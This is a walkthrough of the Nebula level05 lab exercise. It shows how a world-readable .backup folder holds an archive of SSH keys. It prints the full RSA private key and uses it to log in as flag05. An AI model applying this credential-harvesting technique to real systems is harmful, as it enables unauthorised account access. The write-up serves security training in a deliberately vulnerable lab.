Exploit Exercises: Nebula Level 05
Check the flag05 home directory. You are looking for weak directory permissions To do this level, log in as the level05 account with the password level05. Files for this level can be found in /home/flag05.
Source code
There is no source code available for this level.
Solution
Of course we are going to login and go to the flag account folder, but we will be surprised to see this!
1
2
3
4
5
6
7
8
9
10
level05@nebula:/home/flag05$ ls -al
total 5
drwxr-x--- 4 flag05 level05 93 Aug 18 2012 .
drwxr-xr-x 1 root root 80 Aug 27 2012 ..
drwxr-xr-x 2 flag05 flag05 42 Nov 20 2011 .backup
-rw-r--r-- 1 flag05 flag05 220 May 18 2011 .bash_logout
-rw-r--r-- 1 flag05 flag05 3353 May 18 2011 .bashrc
-rw-r--r-- 1 flag05 flag05 675 May 18 2011 .profile
drwx------ 2 flag05 flag05 70 Nov 20 2011 .ssh
level05@nebula:/home/flag05$
Well under our flag folder we have nothing that we can use. Nada! Yet still we have our flag straight under your nose! The best hint for this challenge is “You are looking for weak directory permissions”. So if we run this command:
1
2
3
4
5
6
7
8
level05@nebula:/home/flag05$ ls -lAh
total 5.0K
drwxr-xr-x 2 flag05 flag05 42 Nov 20 2011 .backup
-rw-r--r-- 1 flag05 flag05 220 May 18 2011 .bash_logout
-rw-r--r-- 1 flag05 flag05 3.3K May 18 2011 .bashrc
-rw-r--r-- 1 flag05 flag05 675 May 18 2011 .profile
drwx------ 2 flag05 flag05 70 Nov 20 2011 .ssh
level05@nebula:/home/flag05$
Or just this:
1
2
3
4
5
6
7
8
9
10
level05@nebula:/home/flag05$ ls -al /home/flag05/
total 5
drwxr-x--- 4 flag05 level05 93 Aug 18 2012 .
drwxr-xr-x 1 root root 80 Aug 27 2012 ..
drwxr-xr-x 2 flag05 flag05 42 Nov 20 2011 .backup
-rw-r--r-- 1 flag05 flag05 220 May 18 2011 .bash_logout
-rw-r--r-- 1 flag05 flag05 3353 May 18 2011 .bashrc
-rw-r--r-- 1 flag05 flag05 675 May 18 2011 .profile
drwx------ 2 flag05 flag05 70 Nov 20 2011 .ssh
level05@nebula:/home/flag05$
We will observe a hidden folder called “.backup” with the permissions drwxr-xr-x. All fine let’s see what is in it!
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
level05@nebula:/home/flag05/.backup$ tar -xzvf backup-19072011.tgz
.ssh/
tar: .ssh: Cannot mkdir: Permission denied
.ssh/id_rsa.pub
tar: .ssh: Cannot mkdir: Permission denied
tar: .ssh/id_rsa.pub: Cannot open: No such file or directory
.ssh/id_rsa
tar: .ssh: Cannot mkdir: Permission denied
tar: .ssh/id_rsa: Cannot open: No such file or directory
.ssh/authorized_keys
tar: .ssh: Cannot mkdir: Permission denied
tar: .ssh/authorized_keys: Cannot open: No such file or directory
tar: Exiting with failure status due to previous errors
level05@nebula:/home/flag05/.backup$ ls -al
total 2
drwxr-xr-x 2 flag05 flag05 42 Nov 20 2011 .
drwxr-x--- 4 flag05 level05 93 Aug 18 2012 ..
-rw-rw-r-- 1 flag05 flag05 1826 Nov 20 2011 backup-19072011.tgz
level05@nebula:/home/flag05/.backup$
Uuuuuuuuuuuu, permission denied at “tar -xzvf backup-19072011.tgz” command! Nope. Let’s move it to another folder that we control (~/ or /tmp) and let’s unzip the tgz.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
level05@nebula:/home/flag05/.backup$ cp backup-19072011.tgz ~/
level05@nebula:/home/flag05/.backup$ cd ~/
level05@nebula:~$ ls
backup-19072011.tgz
level05@nebula:~$ ls -al
total 9
drwxr-x--- 1 level05 level05 80 Oct 18 12:43 .
drwxr-xr-x 1 root root 80 Aug 27 2012 ..
-rw-r--r-- 1 level05 level05 220 May 18 2011 .bash_logout
-rw-r--r-- 1 level05 level05 3353 May 18 2011 .bashrc
drwx------ 2 level05 level05 60 Oct 18 12:27 .cache
-rw-r--r-- 1 level05 level05 675 May 18 2011 .profile
drwx------ 2 level05 level05 3 Aug 27 2012 .ssh
-rw-rw-r-- 1 level05 level05 1826 Oct 18 12:43 backup-19072011.tgz
level05@nebula:~$ mkdir ./test
level05@nebula:~$ tar -xvzf backup-19072011.tgz -C ./test
.ssh/
.ssh/id_rsa.pub
.ssh/id_rsa
.ssh/authorized_keys
level05@nebula:~$
Fun time. I’ve seen peoples trying to get the SSH key and to find the password in order to connect to the flag account in order to execute getflag to finish the task.
You could try this also if you want to waste your time on this task.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
level05@nebula:~/test/.ssh$ ls -al
total 12
drwxr-xr-x 2 level05 level05 100 Jul 19 2011 .
drwxrwxr-x 3 level05 level05 60 Oct 18 12:44 ..
-rw-r--r-- 1 level05 level05 394 Jul 19 2011 authorized_keys
-rw------- 1 level05 level05 1675 Jul 19 2011 id_rsa
-rw-r--r-- 1 level05 level05 394 Jul 19 2011 id_rsa.pub
level05@nebula:~/test/.ssh$ cat ./id_rsa
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAywCDXFL7nGpgxuT8y8ZYyzif565M6LexECfaRFl6ECQtP2Vp
vns4RR0HeVFpZMD2dhQQ76sXXK4Jph0/xVRgYytF1hsCJLiedJ3+aWyRMYtkgvZD
TDDD9lYGPzsb3FLqBocxCEpYJLruISY1YdzXpYgIBEVc8Sgq8Ur1uPMHAMYOL+b3
Hga2upWO7vBU9g91SLB6IMyje+2doO5NqmPNgNLzqsPNnv4eiFy46WMAbq9K5tP7
txhQdRxYZwMbhnJ+CLJ0EgXUAgdkvnjlGeD5okP61Eh7lbzHiws68SkflBvcw8KA
sMF6TSXoQECRgoi9ycwTZy4xWspUqij+sY+3EQIDAQABAoIBAAGir2w+/ufzs3Pm
xGKf5nc8rY0gSl5VnIeUyp1iWylmITcxifiO5ZUo9rZzgXXeWB37a2eC6V1Fya4c
7jaYx24FGzruXMYO9rfZzgLrbQAJL3YepcwnWGzTpJk90Kulv1zuGecHMk6ZcvGx
bRysutAKmIXwSR9oQ3BOOkyTKKtI6YeKSnUNU1KVO1t//ps2wFcfXRFb17prpokx
5clWwfUYRLBQlB4XjBIJ3tswpyC0PNOFfzoF+VeUlN9XZFrL0JWHX1F9DDOFJYL5
bXw7zwhjEvZ0/qOvZSJiH4lkbmANsBeMNY/JOGV6T7dWthKBGehCnupeADZVaSeo
Qlysa0ECgYEA6x4FwgpeqNtNGeCcSAUtoviTYMD5LfMEpY8t9eGdRpzw1CDlmG9x
k1LgzE3eA0qlJYx5NNqYEefIPVLdmSuSGS/5KqHeB8Ph7+WqLmguwIIIrfRJoPaD
ON2XqLU6YzAEazTrXnqALjOvP3qdN57xK0zoBAfYlkXJRgMYE1S23YsCgYEA3QhF
Fl11csPc2Yyz/7+9MG9JnOckYvuir+bf3fj/HEuIC9ylwXd4GfSLAW02Sg8DlfRh
M7MxCW9OEWtKgUtHe3fGc6/6X1yF7QfeAYZm8UX/fo6PxuX++mvfPxM4i6vRjgzB
Qy8WisqTK9nLZO+hEdPoVqalz0iUsvu2umz0CVMCgYAsNoUWrCSI1FR3XUmGMZMX
Zm8wbpltDpn9GCOobTjKIpEXEuiZ9bsB3T/wq2Poco0DtprEWabnFxMMlRyexRbA
LclJPw8lnqxKFIIgH+9KvCktrRZ7cl/SvbjbPNkx9cGe92Cbb6XTCl0WLtSJtRXc
8qVevKr59z2WMNbCK9gHaQKBgQDRaQNjpBohKFX2OytSU8uftuBMamV77iJ9e0SA
Hmc83IbBjkPwnwrHtHt6V4lG8yCXktgAznXYFX8mW7tT8gmAfcMkWgbhEFzGbFy2
nyqqzoG42sJ3U/KWOVtifAhns9qvNYBo8ZTu2+xBcHAWaj31EQqgBfU0BPT0+ixu
RcmThwKBgAi0ej7ylHhtwODQGghRmDpxEx9deJ0jilM2EnqIecJj5jnPW8BKDgV4
Dc1QljBeCQ1r30DGYmOIazbhm+orm4df6HWPayRhNBlkmulqTs5GHvLMPjcKMB0k
0Xna7QOtBAnzoHpLcrfvBdfRNE1eC87YkPUhmm5hBgG0+TeMmWgr
-----END RSA PRIVATE KEY-----
level05@nebula:~/test/.ssh$
Or, you could also think that the .tgz file is called backup, so it might be the backup of this system and that it could also store the keys and passwords for ssh. In other smart words:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
level05@nebula:~/test/.ssh$ cp id_rsa /home/level05/.ssh/
level05@nebula:~/test/.ssh$ ssh flag05@192.168.0.101
_ __ __ __
/ | / /__ / /_ __ __/ /___ _
/ |/ / _ \/ __ \/ / / / / __ `/
/ /| / __/ /_/ / /_/ / / /_/ /
/_/ |_/\___/_.___/\__,_/_/\__,_/
exploit-exercises.com/nebula
For level descriptions, please see the above URL.
To log in, use the username of "levelXX" and password "levelXX", where
XX is the level number.
Currently there are 20 levels (00 - 19).
Welcome to Ubuntu 11.10 (GNU/Linux 3.0.0-12-generic i686)
* Documentation: https://help.ubuntu.com/
New release '12.04 LTS' available.
Run 'do-release-upgrade' to upgrade to it.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
flag05@nebula:~$ id
uid=994(flag05) gid=994(flag05) groups=994(flag05)
flag05@nebula:~$ getflag
You have successfully executed getflag on a target account
flag05@nebula:~$
Yes we do not need any password at all, just the private key of the SSH as the system knows already the system as a trusted one. Keep in mind: Be lazy!